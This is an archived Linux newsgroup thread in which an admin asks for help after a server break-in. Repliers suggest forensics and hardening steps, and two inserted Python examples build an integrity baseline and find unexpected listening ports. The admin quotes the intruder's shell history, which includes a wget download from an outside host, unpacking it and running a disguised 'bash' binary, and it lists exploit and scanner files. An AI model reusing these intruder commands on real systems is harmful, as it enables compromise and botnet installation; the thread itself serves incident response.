need help with root hack - Security


Thread: need help with root hack

  1. need help with root hack

    .... I think that's what happened. Pretty sure. I'm pretty newbie with
    Linux security, but the following seems pretty obvious to me.
    I guess I could use some suggestions regarding how serious this is, if
    it can be fixed/repaired/closed, and ideas of what may have been done.
    How the heck did it happen? What can I do to prevent it?
    And if I were running Slackware 10.2, would this have been less likely
    to happen?

    Anyway, I'm running Redora Core 2, and I found an odd entry in my cron
    log:
    Apr 18 09:35:59 fileserve CROND[13807]: (testuser) CMD (//tmp/. /.access.log/y2kupdate >/root/what 2>&1)
    Apr 18 09:36:09 fileserve CROND[13806]: (testuser) MAIL (mailed 47 bytes of output but got status 0x0046 )

    So I looked into the /home/testuser and found .bash_history:

    ls
    wc -l uniq.txt
    ls
    ../eigei 100 &
    ps -x
    ls
    exit
    ps -x
    exit
    w
    ps -x
    cd //tmp/." ";ls -af
    cd w00t;ls
    cat vuln.txt
    wc -l vuln.txt
    ps -x
    exit
    w
    ps -x
    cd //tmp/." "/woot;ls
    cd //tmp/." "/w00t;ls
    cat vuln.txt
    mv 0 pscan2;ls
    wc -l uniq.txt
    ../eigei 100 &
    exit
    w
    ps -x
    cat //tmp/." "/w00t/vuln.txt
    ls //tmp/." "/w00t
    exit
    w
    ps x
    kill -9 31257 31256
    passwd
    /sbin/ifconfig |grep inet
    cat /proc/cpuinfo
    w
    uname -a
    w
    ps x
    cat /proc/cpuinfo
    w
    ps x
    cat /proc/cpuinfo
    w
    ps x
    cat /proc/cpuinfo
    ls -a
    cd /var/tmp
    ls -a
    mkdir ." "
    cd ." "
    ls -a
    tar zxvf omar.tar.gz
    rm -rf omar.tar.gz
    cd .f
    mv x bash
    export PATH="."
    bash
    w
    ps x
    ls -a
    cat /proc/cpuinfo
    ls -
    a
    ls -a
    cd /var/tmp
    ls -a
    cd ." "
    ls -a
    cd .f
    ls -a
    export PATH="."
    bash
    w
    ps x
    cat /proc/cpuinfo
    w
    ps x
    cd /var/tmp
    ls -a
    cd ." "
    ls -a
    cat /etc/hosts
    cat /proc/cpuinfo
    ls-a
    cd .f
    ls -a
    export PATH="."
    bash
    w
    ps x
    cd /vart/emp
    ls -acd /var/tmp
    ls -a
    cd /var/tmp
    ls -a
    cat /etc/hosts
    ls -a
    rm -rf ." "
    /sbin/ifconfig -a |grep inet
    cat /proc/cpuinfo
    ls- a
    ls- a
    wget archive.lydo.org/omar1.tgz
    tar zxvf omar1.tgz
    rm -rf omar1.tgz
    cd .f
    mv x bash
    ../bash
    ps x
    kill -9 2591
    export PATH="."
    bash


    And a bunch of stuff above that with various text files.
    So I looked at /tmp and found a second "." directory.
    [root@fileserve w00t]# pwd
    /tmp/. /w00t

    and in there is:
    [root@fileserve w00t]# ls -al
    total 11752
    drwxr-xr-x 2 523 525 12288 Dec 16 06:26 .
    drwxrwxr-x 3 523 525 4096 Dec 13 11:06 ..
    -rwxr-xr-x 1 523 525 813 Apr 22 2003 asmb
    -rwxr-xr-x 1 523 525 206 Apr 17 2003 auto
    -rwxr-xr-x 1 523 525 1372782 Feb 22 2005 eigei
    -rw-r--r-- 1 523 525 1382400 Feb 22 2005 eigei.tar
    -rwxrwxr-x 1 523 525 10677 Dec 13 11:11 http
    -rw-rw-r-- 1 523 525 6132405 Dec 16 18:58 log.bigsshf
    -rwxr-xr-x 1 523 525 121 Apr 21 2003 make
    -rwxr-xr-x 1 523 525 12736 Apr 21 2003 o0o
    -rw-r--r-- 1 523 525 885 Apr 18 2003 o0o.c
    -rwxr-xr-x 1 523 525 16039 Apr 21 2003 pscan2
    -rw-r--r-- 1 523 525 5767 Apr 21 2003 pscan2.c
    -rwxr-xr-x 1 523 525 30581 Apr 21 2003 samba
    -rw-r--r-- 1 523 525 42762 Apr 21 2003 samba.c
    -rwxr-xr-x 1 523 525 30710 Apr 21 2003 sambas
    -rw-r--r-- 1 523 525 42930 Apr 21 2003 sambas.c
    -rwxr-xr-x 1 523 525 1202824 Jan 30 2005 ssh3
    -rwxr-xr-x 1 523 525 12134 Apr 21 2003 try
    -rw-r--r-- 1 523 525 396 Apr 21 2003 try.c
    -rw-rw-r-- 1 523 525 1609007 Dec 15 16:51 uniq.txt
    -rwxr-xr-x 1 523 525 17833 Apr 21 2003 vuln
    -rw-r--r-- 1 523 525 13516 Apr 21 2003 vuln.c


    I removed the user "testuser", and I'm about to remove this dir.
    But I guess I kind of need to know how bad the damage is.
    Were they able to get root access? Do they likely know all the
    passwords?
    Would changing the passwords even work, or do they likely have some
    kind of keylogger installed?

    Any ideas? This is completely new to me.
    Thanks!
    -Liam


  2. Re: need help with root hack

    news@celticbear.com wrote:
    > ... I think that's what happened. Pretty sure. I'm pretty newbie with
    > Linux security, but the following seems pretty obvious to me.
    > I guess I could use some suggestions regarding how serious this is, if
    > it can be fixed/repaired/closed, and ideas of what may have been done.
    > How the heck did it happen? What can I do to prevent it?
    > And if I were running Slackware 10.2, would this have been less likely
    > to happen?
    >
    > Anyway, I'm running Redora Core 2, and I found an odd entry in my cron
    > log:
    > Apr 18 09:35:59 fileserve CROND[13807]: (testuser) CMD (//tmp/.
    > /.access.log/y2kupdate >/root/what 2>&1)
    > Apr 18 09:36:09 fileserve CROND[13806]: (testuser) MAIL (mailed 47
    > bytes of output but got status 0x0046 )
    >
    > So I looked into the /home/testuser and found .bash_history:
    >

    [..snip..]

    > I removed the user "testuser", and I'm about to remove this dir.
    > But I guess I kind of need to know how bad the damage is.
    > Were they able to get root access? Do they likely know all the
    > passwords?
    > Would changing the passwords even work, or do they likely have some
    > kind of keylogger installed?
    >
    > Any ideas? This is completely new to me.
    > Thanks!
    > -Liam
    >

    Don't trust your box anymore. Apparently some program has been installed
    to take the place of bash. Hard to tell from here which version you
    are using yourself right now. Easy to guess the new Bash does more than
    handle your keystrokes for you....

    Your (his) bash history stops there, simply because a new bash has taken
    over. ASSUME the worst!

    Was testuser a user you created before?
    What do your firewall rules/policies look like?
    (Which) users are allowed to SSH to your machine from remote locations?
    What services do you have running at opened ports?

    Don't throw the 'evidence' away! Save it in an archive on a CD-ROM or
    diskette and keep that for later analysis. Be glad you FOUND the
    evidence; many hacked boxen are only discovered as such much later.
    Block the user, kill the WAN connection.

    Maybe you can try nmap to see what ports are open on your box to the
    outside world. If you want me or someone else to have a look what ports
    are open, you could pm someone, or better, use an online service to have
    your pc scanned. Better still (as long as you are sure no other hosts on
    your LAN are affected), run nmap on those to see what services/ports
    your compromised box advertises through the firewall.

    chkrootkit and rkhunter (both available as yum-able rpms I believe) can
    help spot rootkits on your box.

    New setup is advisable, if not mandatory. Someone installing his own
    bash surely isn't doing that just to see if he can...

    Next install, make sure you use tripwire or AIDE or similar to make a
    checksum database of all the relevant stuff on your machine. That way
    you at least can easily detect which programs/files have been affected
    after a break-in. Be sure to keep the database up-to-date and stored
    somewhere safe (i.e. write-once media or external device, floppies, etc
    etc.)

    HTH
    Sh.
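One way to build the checksum database the reply above recommends, as an added example that is neither tripwire's nor AIDE's own code: it records hash, size and permission bits of every regular file under the given directories, stores them as JSON, and later reports what was added, removed or changed. The files it checks are constructed in a temporary folder, so it runs anywhere.

```python
import hashlib
import json
import os
import stat
import tempfile


def sha256_of(path):
    """Stream the file through SHA-256 so large binaries stay out of RAM."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(roots):
    """Record hash, size and permission bits of every regular file under roots.
    Symlinks are skipped (lstat), so a link swapped to point at a trojan
    shows up as a change in the target's own entry."""
    db = {}
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                st = os.lstat(path)
                if not stat.S_ISREG(st.st_mode):
                    continue
                db[path] = {"sha256": sha256_of(path),
                            "size": st.st_size,
                            "mode": stat.S_IMODE(st.st_mode)}
    return db


def compare(baseline, current):
    """Paths added, removed or changed (content, size or mode) since baseline."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline
                      if p in current and baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def save_baseline(db, path):
    # As the thread advises, keep the real database on write-once or offline
    # media: a baseline the intruder can rewrite proves nothing.
    with open(path, "w") as f:
        json.dump(db, f, indent=1, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def demo():
    """Constructed scenario (hypothetical files, not the poster's system): a
    bin directory is baselined, then 'bash' is overwritten and a hidden
    '.f' file appears, like the 'mv x bash' step in the history above."""
    tmp = tempfile.mkdtemp()
    bindir = os.path.join(tmp, "bin")
    os.makedirs(bindir)
    for name in ("bash", "ls", "ps"):
        with open(os.path.join(bindir, name), "wb") as f:
            f.write(b"#!/bin/sh\necho real " + name.encode() + b"\n")
        os.chmod(os.path.join(bindir, name), 0o755)
    dbfile = os.path.join(tmp, "baseline.json")
    save_baseline(build_baseline([bindir]), dbfile)

    # Tamper after the baseline was taken.
    with open(os.path.join(bindir, "bash"), "wb") as f:
        f.write(b"#!/bin/sh\necho not really bash\n")
    with open(os.path.join(bindir, ".f"), "wb") as f:
        f.write(b"x")

    report = compare(load_baseline(dbfile), build_baseline([bindir]))
    # Strip the temp prefix so the result reads like a real report.
    return {k: [os.path.basename(p) for p in v] for k, v in report.items()}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Note that a tool like this only sees files it was pointed at: a binary dropped in a hidden directory under /var/tmp and run with PATH="." never touches the baselined paths, which is why the shell history itself was the first clue here.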



  3. Re: need help with root hack


    Schraalhans Keukenmeester wrote:
    > news@celticbear.com wrote:
    > > ... I think that's what happened. Pretty sure. I'm pretty newbie with
    > > Linux security, but the following seems pretty obvious to me.
    > > I guess I could use some suggestions regarding how serious this is, if
    > > it can be fixed/repaired/closed, and ideas of what may have been done.
    > > How the heck did it happen? What can I do to prevent it?
    > > And if I were running Slackware 10.2, would this have been less likely
    > > to happen?
    > >
    > > Anyway, I'm running Redora Core 2, and I found an odd entry in my cron
    > > log:
    > > Apr 18 09:35:59 fileserve CROND[13807]: (testuser) CMD (//tmp/.
    > > /.access.log/y2kupdate >/root/what 2>&1)
    > > Apr 18 09:36:09 fileserve CROND[13806]: (testuser) MAIL (mailed 47
    > > bytes of output but got status 0x0046 )
    > >
    > > So I looked into the /home/testuser and found .bash_history:
    > >
    > > ls

    [..snip..]
    > > export PATH="."
    > > bash
    > >
    > >
    > > And a bunch of stuff above that with various text files.
    > > So I looked at /tmp and found a second "." directory.
    > > [root@fileserve w00t]# pwd
    > > /tmp/. /w00t
    > >
    > > and in there is:

    [..snip..]

    > >
    > >
    > > I removed the user "testuser", and I'm about to remove this dir.
    > > But I guess I kind of need to know how bad the damage is.
    > > Were they able to get root access? Do they likely know all the
    > > passwords?
    > > Would changing the passwords even work, or do they likely have some
    > > kind of keylogger installed?
    > >
    > > Any ideas? This is completely new to me.
    > > Thanks!
    > > -Liam
    > >

    > Don't trust your box anymore. Apparently some program has been installed
    > to take the place of bash. Hard to tell from here which version you
    > are using yourself right now. Easy to guess the new Bash does more than
    > handle your keystrokes for you....
    >
    > Your (his) bash history stops there, simply because a new bash has taken
    > over. ASSUME the worst!


    Yeah, I'm going to rebuild the box. =/
    Think Slackware is any more secure out-of-the-box? FC4?

    >
    > Was testuser a user you created before?
    > What do your firewall rules/policies look like ?
    > (which) Users allowed to SSh to your machine from remote locations?
    > What services do you have running at opened ports?
    >


    To be honest, I have no recollection of whether I created it or not. If I
    did, it probably didn't have a good password.
    (*thud*)
    I have no idea what my firewall rules look like. =(
    I once looked into IPTABLES and it was like having to learn a whole new
    language, and not a friendly one either. I just used the built-in
    Fedora Core firewall manager and only had ports 22 and 80 open.

    Fortunately I do know enough to have in my /etc/sshd_config:
    PermitRootLogin no
    AllowUsers liam duane

    So, that's a not bad thing I guess.
    But, how do I check what services I have running on open ports??


    > Don't throw the 'evidence' away!. save it in an archive on a cdrom or
    > diskette and keep that for later analysis. Be glad you FOUND the
    > evidence, many hacked boxen are only discovered as such much later.
    > Block the user, kill the WAN connection.
    >


    Yeah, before I removed the testuser home dir and that hidden folder in
    tmp, I copied them over to /root so I could look at them.
    I'll move them somewhere off the PC.
    Now if I could only really understand what it's telling me. =/

    > Maybe you can try nmap to see what ports are open on your box to the
    > outside world. If you want me or someone else to have a look what ports
    > are open, you could pm someone, or better, use an online service to have
    > your pc scanned. Better still (as long as you are sure no other hosts on
    > your LAN are affected), run nmap on those to see what services/ports
    > your compromised box advertises through the firewall.
    >


    Uhm, OK. I used grc.com's ShieldsUp
    and according to it, only 22 and 80 are open to the outside. All else
    is "stealthed."
    I'll see what I can do about nmap from the outside.

    > chkrootkit and rkhunter (both available as yum-able rpms I believe) can
    > help spot rootkits on your box.
    >


    Well, I ran chkrootkit and got this:
    a LOT of entries labeled "not infected" and the like, and then...

    Checking `chkutmp'... The tty of the following user process(es) were not found in /var/run/utmp !
    ! RUID PID TTY CMD
    ! root 3128 tty4 /sbin/mingetty tty4
    ! root 3134 tty5 /sbin/mingetty tty5
    ! root 3140 tty6 /sbin/mingetty tty6
    chkutmp: nothing deleted
    [root@fileserve chkrootkit-0.46a]# ./chkrootkit ps ls sniffer
    ROOTDIR is `/'
    Checking `ps'... not infected
    Checking `ls'... not infected
    Checking `sniffer'... eth0: PF_PACKET(/usr/local/bin/snort)

    I don't understand the tty thing. Is that good or bad?

    rkhunter (these are cool programs!) and it came up with:
    [..]
    * Application version scan
    - GnuPG 1.2.4 [ OK ]
    - Apache 2.0.51 [ Old or patched version ]
    - Bind DNS 9.2.3 [ OK ]
    - OpenSSL 0.9.7a [ Old or patched version ]
    - PHP 4.3.10 [ Old or patched version ]
    - Procmail MTA 3.22 [ OK ]
    - OpenSSH 3.6.1p2 [ Old or patched version ]
    [..]
    ---------------------------- Scan results ----------------------------

    MD5
    MD5 compared: 49
    Incorrect MD5 checksums: 0

    File scan
    Scanned files: 342
    Possible infected files: 0

    Application scan
    Vulnerable applications: 4

    Now, you mentioned bash was replaced... that didn't seem to detect
    that. Yikes. =(


    > New setup is advisable, if not mandatory. Someone installing his own
    > bash surely isn't doing that just to see if he can...
    >
    > Next install, make sure you use tripwire or AIDE or similar to make a
    > checksum database of all the relevant stuff on your machine. That way
    > you at least can easily detect which programs/files have been affected
    > after a break-in. Be sure to keep the database up-to-date and stored
    > somewhere safe (i.e. write-once media or external device, floppies, etc
    > etc.)
    >


    I'm looking into tripwire for the new install.
    Still I wonder which will be the more useful and secure for a Linux
    security newbie like me: FC4 or Slackware 10.2.
    =/

    Thanks for all the help! This is a lot of great advice and
    information!!

    BTW, I ran chkrootkit on another server in a different WAN, and got:

    [root@s75712 chkrootkit-0.46a]# ./chkrootkit -q
    warning, got duplicate tcp line.
    warning, got duplicate tcp line.

    /usr/lib/perl5/site_perl/5.8.5/i386-linux-thread-multi/auto/Image/Magick/.packlist
    /usr/lib/perl5/5.8.5/i386-linux-thread-multi/.packlist
    /usr/lib/perl5/vendor_perl/5.8.5/i386-linux-thread-multi/auto/mod_perl/.packlist

    warning, got duplicate tcp line.
    warning, got duplicate tcp line.
    warning, got duplicate tcp line.
    warning, got duplicate tcp line.
    warning, got duplicate tcp line.
    warning, got duplicate tcp line.
    warning, got duplicate tcp line.
    warning, got duplicate tcp line.
    warning, got duplicate tcp line.
    INFECTED (PORTS: 31337)

    What can you tell me about these findings?
    What is a duplicate TCP line? And more importantly, how can I find out
    what's going on with port 31337! ("elite." Cute. Not.)

    THANKS!!
    -Liam
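What chkrootkit's `INFECTED (PORTS: 31337)` line is looking at is the kernel's socket table. The following is an added example, not chkrootkit's code: it parses `/proc/net/tcp`, decodes the hex address:port pairs, and flags any network-reachable listener that is not on the set the admin intends to expose (22 and 80 here, as on the box above). The table is constructed for a hypothetical little-endian x86 host and includes a listener on 31337 owned by uid 523.

```python
import socket
import struct

LISTEN = "0A"  # state code for LISTEN in /proc/net/tcp

# Constructed /proc/net/tcp sample (hypothetical host): sshd on 22 and httpd
# on 80, sendmail on loopback 25, an unexplained listener on 31337 (hex 7A69)
# running as uid 523, plus one established ssh session (state 01).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 9127 1 0 100 0 0 10 0
   1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 9310 1 0 100 0 0 10 0
   2: 0100007F:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 9420 1 0 100 0 0 10 0
   3: 00000000:7A69 00000000:0000 0A 00000000:00000000 00:00000000 00000000   523        0 9999 1 0 100 0 0 10 0
   4: 0500000A:0016 0700000A:C3A1 01 00000000:00000000 00:00000000 00000000     0        0 9550 1 0 20 4 30 10 -1
"""


def decode_ipv4(hex_addr):
    """The kernel prints the address as a native-endian 32-bit integer, so on
    x86 (little-endian, assumed here) 0100007F is 127.0.0.1."""
    return socket.inet_ntoa(struct.pack("<I", int(hex_addr, 16)))


def parse_listeners(text):
    """Return (ip, port, uid, inode) for every socket in LISTEN state."""
    listeners = []
    for line in text.splitlines()[1:]:      # first line is the header
        fields = line.split()
        if len(fields) < 10:
            continue
        local, state, uid, inode = fields[1], fields[3], fields[7], fields[9]
        if state != LISTEN:
            continue
        ip_hex, port_hex = local.split(":")
        listeners.append((decode_ipv4(ip_hex), int(port_hex, 16),
                          int(uid), int(inode)))
    return listeners


def unexpected_listeners(text, allowed_ports, ignore_loopback=True):
    """Listeners reachable from the network that are not on the allow list.
    Loopback-only services (127.x) cannot be hit from the WAN, so they are
    skipped by default; the inode lets you tie a hit to a process by
    matching it against the socket links under /proc/<pid>/fd."""
    hits = []
    for ip, port, uid, inode in parse_listeners(text):
        if ignore_loopback and ip.startswith("127."):
            continue
        if port not in allowed_ports:
            hits.append((ip, port, uid, inode))
    return hits


if __name__ == "__main__":
    # Live use: unexpected_listeners(open("/proc/net/tcp").read(), {22, 80})
    for ip, port, uid, inode in unexpected_listeners(SAMPLE_PROC_NET_TCP, {22, 80}):
        print(f"unexpected listener {ip}:{port} uid={uid} inode={inode}")
```

Reading the kernel table directly rather than trusting `netstat` or `ps` output matters on a box where those binaries may have been swapped; a rootkit that hooks the kernel itself can still hide entries, which is why the reply above recommends a rebuild regardless.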


  4. Re: need help with root hack

    In comp.os.linux.misc news@celticbear.com wrote:

    : Schraalhans Keukenmeester wrote:
    :> over. ASSUME the worst!

    : Yeah, I'm going to rebuild the box. =/
    : Think Slackware is any more secure out-of-the-box? FC4?

    Any of the major releases will be plenty secure IF you
    (1) set up security properly in the first place, including
    shutting down all access except what you really need,
    leaving a good firewall in place, never running as root, etc.

    (2) very regularly download and install all security updates.

    An external firewall ( like a dedicated firewall box )
    is an extra layer that can help a bunch.

    As with any security nothing will be 100% protection from the
    really determined hacker short of eliminating all network
    access, but the casual hacker will be very well stopped
    by normal security.

    Stan

    --
    Stan Bischof ("stan" at the below domain)
    www.worldbadminton.com

  5. Re: need help with root hack

    I took a look at the file they downloaded/extracted/installed onto your
    machine. It's an IRC Bot, probably used for advertising/flooding, etc.


  6. Re: need help with root hack


    stan@worldbadminton.com wrote:
    > In comp.os.linux.misc news@celticbear.com wrote:
    >
    > : Schraalhans Keukenmeester wrote:
    > :> over. ASSUME the worst!
    >
    > : Yeah, I'm going to rebuild the box. =/
    > : Think Slackware is any more secure out-of-the-box? FC4?
    >
    > Any of the major releases will be plenty secure IF you
    > (1) set up security properly in the first place- including
    > shutting down all access except what you really need,
    > leaving good firewall in place, never running as root, etc.
    >
    > (2) very regularly download and install all security updates.
    >
    > An external firewall ( like a dedicated firewall box )
    > is an extra layer that can help a bunch.
    >
    > As with any security nothing will be 100% protection from the
    > really determined hacker short of eliminating all network
    > access, but the casual hacker will be very well stopped
    > by normal security.
    >


    Thanks for the reply!
    Someone else said "security is a process, not an application." I'm
    taking that to heart.
    I do have an IP-Cop box between the 'net and the compromised machine,
    but it was in the DMZ with port 80 forwarded to it.

    I've decided to go with Slackware because it's more efficient out of the
    box, and it's going to force me to learn more about security rather
    than allowing me to rely on pre-packaged stuff from RedHat.

    Thanks for the feedback!
    -Liam


  7. Re: need help with root hack


    Ben@atomnet.co.uk wrote:
    > I took a look at the file they downloaded/extracted/installed onto your
    > machine. It's an IRC Bot, probably used for advertising/flooding, etc.


    Thanks for the reply!
    That's kind of what I was thinking, but couldn't be sure.
    Someone else confirmed my own suspicions that because so much evidence
    was left behind and not much care to clean up after themselves, it was
    likely a scriptkiddie who was only interested in installing spam
    software, and not really interested or knowledgeable about gaining root
    access and controlling the box.

    I'm going to rebuild it anyway, of course.
    Thanks again!
    -Liam


  8. Re: need help with root hack


    > Thanks for the reply!
    > Someone else said "security is a process, not an application." I'm
    > taking that to heart.
    > I do have an IP-Cop box between the 'net and the compromised machine,
    > but it was in the DMZ with port 80 forwarded to it.
    >
    > I've decided to go with Slackware because of more efficient out of the
    > box, and it's going to force me to learn more about security rather
    > than allowing me to rely on pre-packaged stuff from RedHat.


    You need to define your use and goals before selecting a distribution.
    If you really want secure, something like CentOS is good, because it's
    based on the RHEL top of the line commercial Linux, and very stable.
    Security releases come out quickly. If you want good security and more
    cutting edge than a stable release, I would go FC4 (or FC5 for more
    cutting edge and less experience from users).

    I would NOT run ssh on the standard port unless you can be sure that
    packets will come from known addresses. If you must allow access from
    random IPs, pick a non-standard port and do a search on "port knocking"
    to secure it.

    It's nice to learn about firewalls and roll your own, but right now you
    are learning by doing post mortem after being hacked. It's a great way
    to learn if you don't mind the "being hacked" part. I would suggest that
    a firewall built by a distribution program is likely to work better than
    what you are likely to write at the moment.

    If you really want security, running virtual machines with xen or
    similar is a learning path.

    --
    -bill davidsen (davidsen@tmr.com)
    "The secret to procrastination is to put things off until the
    last possible moment - but no longer" -me

  9. Re: need help with root hack

    In article ,
    Bill Davidsen wrote:

    >I would NOT run ssh on the standard port unless you can be sure that
    >packets will come from known addresses. If you must allow access from
    >random IPs, pick a non-standard port and do a search on "port knocking"
    >to secure it.


    Don't rely on security-through-obscurity.

  10. Re: need help with root hack

    On 22.04.2006, Lawrence D'Oliveiro wrote:
    > In article ,
    > Bill Davidsen wrote:
    >
    >>I would NOT run ssh on the standard port unless you can be sure that
    >>packets will come from known addresses. If you must allow access from
    >>random IPs, pick a non-standard port and do a search on "port knocking"
    >>to secure it.

    >
    > Don't rely on security-through-obscurity.


    It's not for security, I think. It's just for keeping logs clear

    --
    Feel free to correct my English
    Stanislaw Klekot

  11. Re: need help with root hack

    Lawrence D'Oliveiro wrote:

    > In article ,
    > Bill Davidsen wrote:
    >
    >>I would NOT run ssh on the standard port unless you can be sure that
    >>packets will come from known addresses. If you must allow access from
    >>random IPs, pick a non-standard port and do a search on "port knocking"
    >>to secure it.

    >
    > Don't rely on security-through-obscurity.


    Port-knocking is not "security-through-obscurity" any more than a
    combination lock is "security-through-obscurity". If the need is to allow
    connections from "random IPs", it is FAR, FAR better than just leaving the
    port open to the world (on any port).

  12. Re: need help with root hack

    In article <1212659.HCNjaZ3pTA@rcn.com>,
    matt_left_coast wrote:

    >Lawrence D'Oliveiro wrote:
    >
    >> In article ,
    >> Bill Davidsen wrote:
    >>
    >>>I would NOT run ssh on the standard port unless you can be sure that
    >>>packets will come from known addresses. If you must allow access from
    >>>random IPs, pick a non-standard port and do a search on "port knocking"
    >>>to secure it.

    >>
    >> Don't rely on security-through-obscurity.

    >
    >Port-knocking is not "security-through-obscurity" any more than a
    >combination lock is "security-through-obscurity".


    Wrong analogy.

    The right analogy would be a "secret knock" that you _hope_ nobody else
    is listening to.
